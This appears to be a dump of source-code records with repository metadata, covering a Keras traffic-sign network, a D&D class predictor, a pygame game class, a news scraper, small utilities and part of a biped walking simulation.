model.add(Activation("relu"))
model.add(BatchNormalization(axis=chanDim))
model.add(MaxPooling2D(pool_size=(2, 2)))
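        # first set of FC => RELU layers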
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
# second set of FC => RELU layers
model.add(Flatten())
model.add(Dense(128))
model.add(Activation("relu"))
model.add(BatchNormalization())
model.add(Dropout(0.5))
#softmax classifier
model.add(Dense(classes))
model.add(Activation("softmax"))
#return the constructed network architecture
return model
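# Hypothetical usage sketch (the 32x32x3 input size and 43-class output are assumptions,
# not taken from this file):
#   model = TrafficSignNet.build(width=32, height=32, depth=3, classes=43)
#   model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])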
|
[
"filip.bozic@student.um.si"
] |
filip.bozic@student.um.si
|
bc7e20b9311d255c3353f7a015de56cb7971e407
|
9ab27d9f29d924937223842d2f9beebf7a669107
|
/AbilityScoreAndClassMashineLearning.py
|
9f0b8af1ce6a26cefab25559a7f494e97b62fc79
|
[] |
no_license
|
Micniks/Python-Exam
|
c21749b7cfbb6635ffb78e9a808c80bda0b6530d
|
24cbf96762c3e654ea865c32603330db5fbdc4c2
|
refs/heads/main
| 2023-02-04T02:29:01.207912
| 2020-12-27T13:30:38
| 2020-12-27T13:30:38
| 318,752,729
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,100
|
py
|
import pandas as pd
import numpy as np
import argparse
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
default_dataset = 'https://raw.githubusercontent.com/oganm/dndstats/master/docs/charTable.tsv'
class DNDClassPredictor:
"""
    This class uses machine learning to make guesses about good class choices based on a chosen ability score
"""
def __init__(self, dataset = None):
"""
Initiate the class, either with a given dataset, or it will pull from the default dataset.
"""
#Get data from dataset
if dataset is None:
self.dataset = pd.read_csv(default_dataset, sep='\t')
else:
self.dataset = dataset
        self.__features = self.dataset[['Str','Dex','Con','Int','Wis','Cha']]  # column order matches the documented CLI input order
targets = self.dataset[['justClass']]
#Get List of single class strings, not including any multiclasses
classes_list = targets.drop_duplicates()
single_class_list = [c for c in classes_list['justClass'] if '|' not in c]
single_class_list.sort()
#Replace all class strings with number
self.__classes_dict = {}
for idx in range(len(single_class_list)):
dnd_class = single_class_list[idx]
self.__classes_dict[dnd_class] = idx
numeric_targets = targets.replace(self.__classes_dict)
targets = numeric_targets
#Removing all multiclass strings, that was not removed above, and replace with single value
numeric_targets = targets.replace("^\w.*$", len(self.__classes_dict), regex=True)
self.__targets = numeric_targets
#Finalizing the dict, and adding an opposite dict for classes
self.__classes_dict['Multiclassing'] = len(self.__classes_dict)
self.__classes_numeric_dict = {y:x for x,y in self.__classes_dict.items()}
        #Using another class method to fit a model for prediction, and check if the model has good test results
min_test_score = 0.4
test_score = 0
found_good_model = False
for num in (range(1,1001)):
model = self.fit_class_model()
if (model["test_score"] >= min_test_score):
found_good_model = True
self.__model = model["model"]
break
elif (model["test_score"] > test_score):
self.__model = model["model"]
test_score = model["test_score"]
if(not found_good_model):
            print('WARNING: The model could not achieve a good test score, and is only', test_score*100, 'percent accurate in test')
def fit_class_model(self):
"""
Method to get dict containing a model fit with data from the dataset, along with a score for the model
"""
#Setting up the model, and testing with classification
x_train,x_test,y_train,y_test = train_test_split(self.__features,self.__targets,test_size=0.3)
model = DecisionTreeClassifier()
model.fit(x_train, y_train)
#Display the score for the model from the dataset
test_score = model.score(x_test, y_test)
return {"model": model, "test_score": test_score}
#print('Train Score:', self.__model.score(x_train, y_train))
#print('Testing Score', self.__model.score(x_test, y_test))
def predict_class_from_ability_scores(self, ability_scores):
"""
Uses the class model to try and predict a good class choice for a given ability score, based on the dataset.
"""
numeric_result = self.__model.predict([ability_scores])[0]
result = self.__classes_numeric_dict[numeric_result]
return "The given ability scores would work well with a class choice of: " + result
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='This program allows you to input 6 ability scores for dungeons and dragons 5th edition, and get a suitable class for those ability scores as output')
parser.add_argument('-ab','--abilityScores', nargs='+', help='<Required> Give a list of the ability scores in the following order: Strength(Str) Dexterity(Dex) Constitution(Con) Intelligence(Int) Wisdom(Wis) Charisma(Cha)', required=True)
args = parser.parse_args()
input = args.abilityScores
if(len(input) == 6):
try:
ability_scores = []
for score in input:
ability_scores.append(int(score))
classPredictor = DNDClassPredictor()
result = classPredictor.predict_class_from_ability_scores(ability_scores)
msg = result
print(msg)
except ValueError:
print("One or more of the ability scores could not be read as a numbers")
else:
print("The given input needs exactly 6 arguments, seperated by space, representing, in order: Strength(Str) Dexterity(Dex) Constitution(Con) Intelligence(Int) Wisdom(Wis) Charisma(Cha)")
|
[
"Michael12.korsgaard@gmail.com"
] |
Michael12.korsgaard@gmail.com
|
54233aff7a165d2f58face68023c6e17308bd0a4
|
04568fae7b4923656043a2ff08e715a5898081f1
|
/space_rocks/player.py
|
1a6e14cd6a339ab61bc7bbc497c2d0ee238cde06
|
[] |
no_license
|
balanikas/space-rocks
|
5c32e9a4f3579836af43439df71596a8a6ade5ec
|
d3aba42b74a05b489fcb9349ae5015ca34d23419
|
refs/heads/master
| 2023-05-03T11:04:29.764783
| 2021-05-15T16:26:06
| 2021-05-15T19:47:58
| 350,666,293
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,547
|
py
|
from enum import Enum
from typing import NamedTuple, Callable, Any
import pygame
from pygame import Vector2
from pygame.surface import Surface
import space_rocks.animation as anim
import space_rocks.audio as sounds
import space_rocks.graphics as gfx
from space_rocks.geometry import Geometry
from space_rocks.models import Bullet, BulletProperties, GameObject
from space_rocks.utils import (
bounce_other,
get_blit_position,
scale_and_rotate,
bounce_edge,
get_resize_factor,
)
from space_rocks.window import window
class ActiveWeapon(Enum):
PRIMARY = 1
SECONDARY = 2
class PlayerProperties(NamedTuple):
damage: float
armor: float
maneuverability: float
acceleration: float
sound_on_impact: str
image_name: str
anim_on_destroy: str
primary_weapon: BulletProperties
secondary_weapon: BulletProperties
def validate(self):
assert self.damage > 0
assert self.armor > 0
assert self.maneuverability > 0
assert self.acceleration > 0
class Player(GameObject):
UP = Vector2(0, -1)
def __init__(
self,
properties: PlayerProperties,
position: Vector2,
create_bullet_callback: Callable[[Any], None],
):
self._p = properties
self._create_bullet_callback = create_bullet_callback
self._direction = self.UP
self._active_weapon = ActiveWeapon.PRIMARY
self._last_shot = 0
self._armor = self._p.armor
self._angle = 0.0
super().__init__(
position,
gfx.get(self._p.image_name, resize=get_resize_factor(0.1)),
Vector2(0),
)
self._rotated_image = self.image
@property
def damage(self):
return self._p.damage
@property
def armor(self):
return self._armor
@property
def direction(self):
return self._direction
def resize(self):
self.image = gfx.get(self._p.image_name, resize=get_resize_factor(0.1))
self.reposition()
def rotate(self, clockwise: bool = True):
sign = 1 if clockwise else -1
angle = self._p.maneuverability * sign
self._direction = self._direction.rotate(angle)
def move(self, surface: Surface):
self.geometry = bounce_edge(surface, 50, 0.6, self.geometry)
self.rect.center = (
int(self.geometry.position.x),
int(self.geometry.position.y),
)
def draw(self, surface: Surface):
if self.armor <= 0:
return
angle = self._direction.angle_to(self.UP)
if angle != self._angle:
rotated_surface = scale_and_rotate(self.image, angle, 1)
self._rotated_image = rotated_surface
self._angle = angle
else:
rotated_surface = self._rotated_image
blit_position = get_blit_position(rotated_surface, self.geometry.position)
surface.blit(rotated_surface, blit_position)
def accelerate(self):
self.geometry = self.geometry.update_vel(
self.geometry.velocity + (self._direction * self._p.acceleration)
)
def switch_weapon(self):
if self._active_weapon == ActiveWeapon.PRIMARY:
self._active_weapon = ActiveWeapon.SECONDARY
else:
self._active_weapon = ActiveWeapon.PRIMARY
sounds.play("change_weapon")
def shoot(self):
w = (
self._p.primary_weapon
if self._active_weapon == ActiveWeapon.PRIMARY
else self._p.secondary_weapon
)
if pygame.time.get_ticks() - self._last_shot < w.reload:
return
self._last_shot = pygame.time.get_ticks()
weapon_velocity = self._direction * w.speed
weapon_velocity = Vector2(
weapon_velocity.x * window.factor.x, weapon_velocity.y * window.factor.y
)
w = Bullet(w, self.geometry.position, weapon_velocity)
self._create_bullet_callback(w)
def hit(self, other: Geometry, damage: float):
self._armor -= damage
if self._armor > 0:
sounds.play(self._p.sound_on_impact)
self.geometry = bounce_other(self.geometry, other)
else:
sounds.play(self._p.sound_on_impact)
def get_impact_animation(self) -> anim.Animation:
return anim.get(
self._p.anim_on_destroy, self.geometry.position, resize=(200, 200)
)
@property
def active_weapon(self) -> ActiveWeapon:
return self._active_weapon
|
[
"c_balanikas@hotmail.com"
] |
c_balanikas@hotmail.com
|
da106758572a7ac440addece5128e3cf9cf417b4
|
4c0a2efb54a87e8419c530e49173484660021c16
|
/src/demo_hic_et_nunc/types/hen_minter/parameter/swap.py
|
7c54aa138c71b7a9035676794c8af5b23cf473d0
|
[
"MIT"
] |
permissive
|
jellybazil/dipdup-py
|
7cc6641b7a25379034be401626d91d17d2493f43
|
950b086effbfce78080461ecc2f959ba7a8ba998
|
refs/heads/master
| 2023-08-12T06:50:01.445161
| 2021-10-16T20:52:29
| 2021-10-16T20:52:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 279
|
py
|
# generated by datamodel-codegen:
# filename: swap.json
from __future__ import annotations
from pydantic import BaseModel, Extra
class SwapParameter(BaseModel):
class Config:
extra = Extra.forbid
objkt_amount: str
objkt_id: str
xtz_per_objkt: str
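# Hypothetical instantiation (the values are placeholders, not taken from any real swap call):
#   SwapParameter(objkt_amount='1', objkt_id='152', xtz_per_objkt='1000000')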
|
[
"noreply@github.com"
] |
noreply@github.com
|
53977bf089d82553874f17592e4816552cc6084d
|
c9731d11c7e0a363b98849a95a43e28114375924
|
/Medium/ArmstrongNumber.py
|
f4d036541234f0dc70beaaefe4694cc40b35741a
|
[] |
no_license
|
kanuos/solving-https-github.com-ProgrammingHero1-100-plus-python-coding-problems-with-solutions
|
009103de05d5a6fa8ab072f75d1080c207b1b57d
|
1b37942e83118bba26c490dfb79e7b99d006961c
|
refs/heads/main
| 2023-04-07T00:45:00.907554
| 2021-04-14T22:07:32
| 2021-04-14T22:07:32
| 356,587,876
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
# Armstrong number.
# A number is an Armstrong Number or narcissistic number
# if it is equal to the sum of its own digits raised to the power of the number of digits.
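# e.g. 153 has 3 digits and 1**3 + 5**3 + 3**3 == 153, so 153 is an Armstrong number,
# while 154 is not (1**3 + 5**3 + 4**3 == 190).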
def is_armstrong(number: int) -> bool:
    # raise each digit to the power of the digit count, as in the definition above
    num_digits = len(str(number))
    digit_power_sum = 0
    temp = number
    while temp > 0:
        digit_power_sum += (temp % 10) ** num_digits
        temp //= 10
    return digit_power_sum == number
def nearest_armstrong(number):
pre = 0
print("Checking for nearest Armstrong Numbers. Please wait...")
for i in range(number, 1, -1):
if is_armstrong(i):
pre = i
break
while True:
number += 1
if is_armstrong(number):
post = number
break
print("Found nearest Armstrong Numbers")
return pre, post
try:
num = int(input("Enter a number : "))
if is_armstrong(num):
print(f"{num} is an Armstrong Number")
else:
print(f"{num} is not an Armstrong Number")
before, after = nearest_armstrong(num)
print(f"The nearest Armstrong Numbers of {num} are {before} and {after}")
except ValueError:
print("Input must be a number")
|
[
"sounakmukherjee@ymail.com"
] |
sounakmukherjee@ymail.com
|
f8f2a2c16488ab7b2db5c75b3e3384fe28779156
|
c5458f2d53d02cb2967434122183ed064e1929f9
|
/sdks/python/test/test_generate_commitments_request.py
|
8c5a96d5277ec4d96a679c0c58dcd09553377df4
|
[] |
no_license
|
ross-weir/ergo-node-api-sdks
|
fd7a32f79784dbd336ef6ddb9702b9dd9a964e75
|
9935ef703b14760854b24045c1307602b282c4fb
|
refs/heads/main
| 2023-08-24T05:12:30.761145
| 2021-11-08T10:28:10
| 2021-11-08T10:28:10
| 425,785,912
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,207
|
py
|
"""
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: ergoplatform@protonmail.com
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.generate_commitments_request_secrets import GenerateCommitmentsRequestSecrets
from openapi_client.model.unsigned_ergo_transaction import UnsignedErgoTransaction
globals()['GenerateCommitmentsRequestSecrets'] = GenerateCommitmentsRequestSecrets
globals()['UnsignedErgoTransaction'] = UnsignedErgoTransaction
from openapi_client.model.generate_commitments_request import GenerateCommitmentsRequest
class TestGenerateCommitmentsRequest(unittest.TestCase):
"""GenerateCommitmentsRequest unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testGenerateCommitmentsRequest(self):
"""Test GenerateCommitmentsRequest"""
# FIXME: construct object with mandatory attributes with example values
# model = GenerateCommitmentsRequest() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"29697678+ross-weir@users.noreply.github.com"
] |
29697678+ross-weir@users.noreply.github.com
|
2aa099e77ec976eea8a2ce7424afac7d5124999a
|
b0c2a8c77fc0e025690e59f990950b6eb347c4c3
|
/corpus_builder/spiders/newspaper/janakantha.py
|
f0a39957ada5c7a106bab473fa6104a3258d95fb
|
[
"MIT"
] |
permissive
|
ibraheem-moosa/corpus-builder
|
1b31cbc501026436e5ebde2e363379b6fc094dd0
|
5f09835f9aa62abb5f891c4d3896206eedd9fe12
|
refs/heads/master
| 2020-08-06T21:39:31.700339
| 2018-08-24T14:00:18
| 2018-08-24T14:00:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,923
|
py
|
# -*- coding: utf-8 -*-
import datetime
import urlparse
import scrapy
from corpus_builder.templates.spider import CommonSpider
class JanakanthaSpider(CommonSpider):
name = "janakantha"
allowed_domains = ["dailyjanakantha.com"]
base_url = 'https://www.dailyjanakantha.com'
start_request_url = base_url
content_body = {
'css': 'p.artDetails *::text'
}
allowed_configurations = [
['start_date'],
['start_date', 'end_date'],
['category', 'start_date'],
['category', 'start_date', 'end_date'],
]
def request_index(self, response):
menu_links = [urlparse.urlparse(x.strip()).path.split('/')[-1] \
for x in response.css('nav.menu a::attr("href")').extract()]
categories = [x for x in menu_links if (not x == "" and not x == "#")]
if self.category is not None:
if self.category in categories:
categories = [self.category]
else:
raise ValueError('invalid category slug. available slugs: %s' % ", ".join(categories))
date_processing = self.start_date
while date_processing <= self.end_date:
for category in categories:
# https://www.dailyjanakantha.com/frontpage/date/2016-06-01
url = self.base_url + '/{0}/date/{1}'.format(
category,
date_processing.strftime('%Y-%m-%d')
)
yield scrapy.Request(url, callback=self.extract_news_category)
date_processing += datetime.timedelta(days=1)
def extract_news_category(self, response):
        news_links = list(set(response.xpath('//div[@class="content"]//a/@href').extract()))
for link in news_links:
if not link[:4] == 'http':
link = self.base_url + link
yield scrapy.Request(link, callback=self.parse_content)
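    # Hypothetical crawl invocation (argument names follow allowed_configurations above;
    # how CommonSpider parses them is assumed, not shown here):
    #   scrapy crawl janakantha -a start_date=2016-06-01 -a end_date=2016-06-03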
|
[
"aniruddha@adhikary.net"
] |
aniruddha@adhikary.net
|
ced957c5f5648e9b066bb688b28dddf47767fc8e
|
a808067d0becc34f4f5bf49ca80bfdeaa5f52d37
|
/utils/readYaml.py
|
9106be7525b8aae495bea5b8801d40c7d383cc45
|
[] |
no_license
|
ir3lia/interfaceAutoTest
|
08595e46daa9cbe7e2f1f7511c864726b26ca6cd
|
70f6cc8d50680b17bad686f45b36f9f36e0a1ac9
|
refs/heads/master
| 2023-02-01T19:26:59.899806
| 2020-12-16T09:46:02
| 2020-12-16T09:46:02
| 321,935,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
import yaml
def get_test_data(test_data_path):
    case = []  # stores the test case names
    http = []  # stores the request objects
    expected = []  # stores the expected results
with open(test_data_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
test = dat['tests']
for td in test:
case.append(td.get('case', ''))
http.append(td.get('http', {}))
expected.append(td.get('expected', {}))
parameters = zip(case,http, expected)
return case, parameters
def get_config(test_host_path,type):
    configs = []  # stores the config entries
with open(test_host_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
config = dat['config']
for td in config:
configs.append(td.get(type, {}))
return configs
def get_apiPath(test_api_path):
    apipaths = []  # stores the API paths
with open(test_api_path) as f:
dat = yaml.load(f.read(), Loader=yaml.SafeLoader)
apiPath = dat['apiPath']
for td in apiPath:
apipaths.append(td.get('paths', {}))
return apipaths
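# Sketch of the YAML layout these helpers expect (key names come from the code above;
# the values are invented for illustration):
# tests:
#   - case: "query user info"
#     http: {method: GET, url: /api/user}
#     expected: {status_code: 200}
# config:
#   - host: {base_url: "http://example.com"}
# apiPath:
#   - paths: {login: /api/login}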
|
[
"“13869517521@163.com"
] |
“13869517521@163.com
|
fe54aba99af7334fa816a9c0282b522dea6e026c
|
8d55d41a4f5c0b89331cac714c1525e9581d9720
|
/WalkingFoot/main_RevisionExamples2.py
|
18a2303fe1a6b91bde48556986a9ae98c1b31b48
|
[
"Apache-2.0"
] |
permissive
|
hpgit/HumanFoot
|
8cf35ceeeb35a0371e03eaf19d6da58dc01487eb
|
f9a1a341b7c43747bddcd5584b8c98a0d1ac2973
|
refs/heads/master
| 2022-04-13T23:38:19.072203
| 2019-12-06T06:36:10
| 2019-12-06T06:36:10
| 41,348,141
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43,724
|
py
|
from fltk import *
import copy, os.path, cPickle, time
import numpy as np
import sys
if '../PyCommon/modules' not in sys.path:
sys.path.append('../PyCommon/modules')
import Math.mmMath as mm
import Math.csMath as cm
import Math.ysFunctionGraph as yfg
import Renderer.ysRenderer as yr
import Renderer.csVpRenderer as cvr
import Simulator.csVpWorld as cvw
import Simulator.csVpModel as cvm
import Simulator.ysVpUtil as yvu
import GUI.ysSimpleViewer as ysv
import GUI.ysMultiViewer as ymv
import ArticulatedBody.ysControl as yct
import ArticulatedBody.ysReferencePoints as yrp
import Motion.ysMotionAnalysis as yma
import Motion.ysBipedAnalysis as yba
import Motion.ysMotion as ym
import Motion.ysMotionBlend as ymb
import Motion.ysMotionExtend as ymt
import Motion.ysSkeletonEdit as yhe
import Motion.mmAnalyticIK as aik
import Util.ysMatplotEx as ymp
import Resource.ysMotionLoader as yf
import Simulator.ysPhysConfig as ypc
MOTION_COLOR = (213,111,162)
CHARACTER_COLOR = (20,166,188)
#BOX_COLOR = (255,204,153)
BOX_COLOR = (235,184,133)
def push_simbicon_mass():
# Trunk 29.27
# Head 5.89
# Pelvis 16.61
# Thigh 8.35
# Shank 4.16
# Foot 1.34
# Arm 2.79
# Forearm 1.21
# Hand 0.55
class ForceInfo:
def __init__(self, startFrame, duration, force):
self.startFrame = startFrame # frame
self.duration = duration # sec
self.force = force # Newton
self.targetBody = None
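    # For example, ForceInfo(240, .4, (160,0,0)) describes a 160 N push along +x starting
    # at frame 240 and lasting 0.4 s; targetBody is filled in later in this script.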
#===============================================================================
# load motion
#===============================================================================
MULTI_VIEWER = False
CAMERA_TRACKING = True
TORQUE_PLOT = False
# global parameters
Kt = 60.; Dt = 2*(Kt**.5)
Ks = 4000.; Ds = 2*(Ks**.5)
K_stb_vel = .1
mu = 2.
    # constants
c_min_contact_vel = 100.
# c_min_contact_vel = 2.
c_min_contact_time = .7
c_landing_duration = .2
c_taking_duration = .3
# c_swf_mid_offset = .0
c_swf_mid_offset = .02
c_swf_stability = .5
c_locking_vel = .05
# c_swf_offset = .0
c_swf_offset = .01
# c_swf_offset = .005
K_stp_pos = 0.
# c5 = .5; c6 = .01
c5 = .5; c6 = .02
# c5 = .5; c6 = .05
# c5 = 1.; c6 = .05
# c5 = .0; c6 = .0
K_stb_vel = .1
K_stb_pos = .1
OLD_SWING_HEIGHT = False
# OLD_SWING_HEIGHT = True
HIGHER_OFFSET = True
# HIGHER_OFFSET = False
dir = './ppmotion/'
# max push
# forceInfos = []
# maximum
# forceInfos = [ForceInfo(4*i*30, .4, (160,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (-130,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (0,0,80)) for i in range(2,12)]
forceInfos = [ForceInfo(4*i*30+1, .4, (0,0,-105)) for i in range(2,12)]
# # maximum with more checking
# forceInfos = [ForceInfo(4*i*30, .4, (145,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30+1, .4, (-120,0,0)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30+1, .4, (0,0,80)) for i in range(2,12)]
# forceInfos = [ForceInfo(4*i*30, .4, (0,0,-105)) for i in range(2,12)]
# # for video
# forceInfos = [ForceInfo(4*i*30+2, .4, (160,0,0)) for i in range(2,4)] \
# + [ForceInfo(4*i*30+2, .4, (0,0,-105)) for i in range(4,6)] \
# + [ForceInfo(4*i*30+2, .4, (-130,0,0)) for i in range(6,8)] \
# + [ForceInfo(4*i*30+2, .4, (0,0,80)) for i in range(8,10)]
# Kt = 40.; Dt = 2*(Kt**.5)
# Ks = 3000.; Ds = 2*(Ks**.5)
# mu = 1.
# c_swf_mid_offset = .04
# K_swp_vel_sag = .0; K_swp_vel_sag_faster = .0;
# K_swp_pos_sag = 1.5; K_swp_pos_sag_faster = .1;
# K_swp_vel_cor = .25; K_swp_pos_cor = .3
# K_stp_pos = 0.
# K_stb_vel = .02
# K_stb_pos = .15
Kt = 40.; Dt = 2*(Kt**.5)
Ks = 3000.; Ds = 2*(Ks**.5)
mu = 1.5
c_swf_mid_offset = .04
K_swp_vel_sag = .05; K_swp_vel_sag_faster = .0;
K_swp_pos_sag = 1.7; K_swp_pos_sag_faster = .1;
K_swp_vel_cor = .25; K_swp_pos_cor = .3
# K_stb_vel = .02
# K_stb_pos = .15
filename = 'wd2_WalkSameSame01_REPEATED.bvh'
motion_ori = yf.readBvhFile(dir+filename)
frameTime = 1/motion_ori.fps
if 'REPEATED' in filename:
REPEATED = True
CAMERA_TRACKING = True
else:
REPEATED = False
#===============================================================================
# options
#===============================================================================
SEGMENT_EDITING = True
STANCE_FOOT_STABILIZE = True
MATCH_STANCE_LEG = True
SWING_FOOT_PLACEMENT = True
SWING_FOOT_HEIGHT = True
if '_FOOT' in filename:
SWING_FOOT_ORIENTATION = True
else:
SWING_FOOT_ORIENTATION = False
STANCE_FOOT_PUSH = True
STANCE_FOOT_BALANCING = True
stitch_func = lambda x : 1. - yfg.hermite2nd(x)
stf_stabilize_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])
match_stl_func = yfg.hermite2nd
# match_stl_func_y = yfg.hermite2nd
swf_placement_func = yfg.hermite2nd
swf_height_func = yfg.hermite2nd
swf_height_sine_func = yfg.sine
# stf_balancing_func = yfg.concatenate([yfg.hermite2nd, yfg.one], [c_landing_duration])
stf_balancing_func = yfg.hermite2nd
#===============================================================================
# initialize character
#===============================================================================
# mcfgfile = open(dir + 'mcfg', 'r')
mcfgfile = open('mcfg_simbicon', 'r')
mcfg = cPickle.load(mcfgfile)
mcfgfile.close()
wcfg = ypc.WorldConfig()
wcfg.planeHeight = 0.
wcfg.useDefaultContactModel = False
wcfg.lockingVel = c_locking_vel
stepsPerFrame = 30
wcfg.timeStep = (frameTime)/stepsPerFrame
vpWorld = cvw.VpWorld(wcfg)
motionModel = cvm.VpMotionModel(vpWorld, motion_ori[0], mcfg)
controlModel = cvm.VpControlModel(vpWorld, motion_ori[0], mcfg)
vpWorld.initialize()
print controlModel
motionModel.recordVelByFiniteDiff()
controlModel.initializeHybridDynamics()
#===============================================================================
# load segment info
#===============================================================================
skeleton = motion_ori[0].skeleton
segname = os.path.splitext(filename)[0]+'.seg'
segfile = open(dir+segname, 'r')
seginfo = cPickle.load(segfile)
segfile.close()
intervals = [info['interval'] for info in seginfo]
states = [info['state'] for info in seginfo]
temp_motion = copy.deepcopy(motion_ori)
segments = yma.splitMotionIntoSegments(temp_motion, intervals)
print len(intervals), 'segments'
for i in range(len(intervals)):
print '%dth'%i, yba.GaitState.text[states[i]], intervals[i], ',',
print
motion_seg_orig = ym.JointMotion()
motion_seg_orig += segments[0]
motion_seg = ym.JointMotion()
motion_seg += segments[0]
motion_stitch = ym.JointMotion()
motion_stitch += segments[0]
motion_stf_stabilize = ym.JointMotion()
motion_match_stl = ym.JointMotion()
motion_swf_placement = ym.JointMotion()
motion_swf_height = ym.JointMotion()
motion_swf_orientation = ym.JointMotion()
motion_stf_balancing = ym.JointMotion()
motion_stf_push = ym.JointMotion()
motion_control = ym.JointMotion()
motion_debug1 = ym.JointMotion()
motion_debug2 = ym.JointMotion()
motion_debug3 = ym.JointMotion()
P = ym.JointMotion()
P_hat = ym.JointMotion()
M_tc = ym.JointMotion()
M_hat_tc_1 = ym.JointMotion()
#===============================================================================
# loop variable
#===============================================================================
seg_index = [0]
acc_offset = [0]
extended = [False]
prev_R_swp = [None]
stl_y_limit_num = [0]
stl_xz_limit_num = [0]
avg_dCM = [mm.O_Vec3()]
# avg_stf_v = [mm.O_Vec3()]
# avg_stf_av = [mm.O_Vec3()]
# stf_push_func = [yfg.zero]
step_length_cur = [0.]
step_length_tar = [0.]
step_axis = [mm.O_Vec3()]
#===============================================================================
# information
#===============================================================================
bodyIDsToCheck = range(vpWorld.getBodyNum())
mus = [mu]*len(bodyIDsToCheck)
bodyMasses = controlModel.getBodyMasses()
totalMass = controlModel.getTotalMass()
lID = controlModel.name2id('LeftFoot'); rID = controlModel.name2id('RightFoot')
lUpLeg = skeleton.getJointIndex('LeftUpLeg');rUpLeg = skeleton.getJointIndex('RightUpLeg')
lKnee = skeleton.getJointIndex('LeftLeg'); rKnee = skeleton.getJointIndex('RightLeg')
lFoot = skeleton.getJointIndex('LeftFoot'); rFoot = skeleton.getJointIndex('RightFoot')
spine = skeleton.getJointIndex('Spine')
uppers = [skeleton.getJointIndex(name) for name in ['Hips', 'Spine', 'Spine1', 'LeftArm', 'LeftForeArm', 'RightArm', 'RightForeArm']]
upperMass = sum([bodyMasses[i] for i in uppers])
lLegs = [skeleton.getJointIndex(name) for name in ['LeftUpLeg', 'LeftLeg', 'LeftFoot']]
rLegs = [skeleton.getJointIndex(name) for name in ['RightUpLeg', 'RightLeg', 'RightFoot']]
allJoints = set(range(skeleton.getJointNum()))
halfFootHeight = controlModel.getBodyShape(lFoot)[1] / 2.
for fi in forceInfos:
fi.targetBody = spine
#===========================================================================
# data collection
#===========================================================================
rhip_torques = []
rknee_torques = []
rankle_torques = []
#===============================================================================
# rendering
#===============================================================================
rd_CM = [None]; rd_CP = [None]; rd_CMP = [None]
rd_forces = [None]; rd_force_points = [None]
rd_torques = []; rd_joint_positions = []
rd_point1 = [None]
rd_point2 = [None]
rd_vec1 = [None]; rd_vecori1 = [None]
rd_vec2 = [None]; rd_vecori2 = [None]
rd_frame1 = [None]
rd_frame2 = [None]
if MULTI_VIEWER:
viewer = ymv.MultiViewer(800, 655, True, wheelWork=True)
# viewer = ymv.MultiViewer(1600, 1255)
viewer.setRenderers1([cvr.VpModelRenderer(motionModel, MOTION_COLOR, yr.POLYGON_FILL)])
viewer.setRenderers2([cvr.VpModelRenderer(controlModel, CHARACTER_COLOR, yr.POLYGON_FILL),
yr.ForcesRenderer(rd_forces, rd_force_points, (255,0,0), ratio=.01, lineWidth=.04, fromPoint=False)])
# viewer.glWindow2.groundOffset[0] -= 10
viewer.glWindow2.groundSize = 100
else:
viewer = ysv.SimpleViewer()
# viewer.record(False)
# viewer.doc.addRenderer('motionModel', cvr.VpModelRenderer(motionModel, (0,150,255), yr.POLYGON_LINE))
viewer.doc.addRenderer('controlModel', cvr.VpModelRenderer(controlModel, (200,200,200), yr.POLYGON_LINE))
# viewer.doc.addObject('motion_ori', motion_ori)
# viewer.doc.addRenderer('motion_ori', yr.JointMotionRenderer(motion_ori, (0,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_seg_orig', yr.JointMotionRenderer(motion_seg_orig, (0,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_seg', yr.JointMotionRenderer(motion_seg, (0,150,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stitch', yr.JointMotionRenderer(motion_stitch, (0,255,200), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_stabilize', yr.JointMotionRenderer(motion_stf_stabilize, (255,0,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_match_stl', yr.JointMotionRenderer(motion_match_stl, (255,200,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_placement', yr.JointMotionRenderer(motion_swf_placement, (255,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_height', yr.JointMotionRenderer(motion_swf_height, (50,255,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_swf_orientation', yr.JointMotionRenderer(motion_swf_orientation, (255,100,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_push', yr.JointMotionRenderer(motion_stf_push, (50,255,200), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_stf_balancing', yr.JointMotionRenderer(motion_stf_balancing, (255,100,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_control', yr.JointMotionRenderer(motion_control, (255,0,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug1', yr.JointMotionRenderer(motion_debug1, (0,255,0), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug2', yr.JointMotionRenderer(motion_debug2, (255,0,255), yr.LINK_BONE))
# viewer.doc.addRenderer('motion_debug3', yr.JointMotionRenderer(motion_debug3, (255,255,0), yr.LINK_BONE))
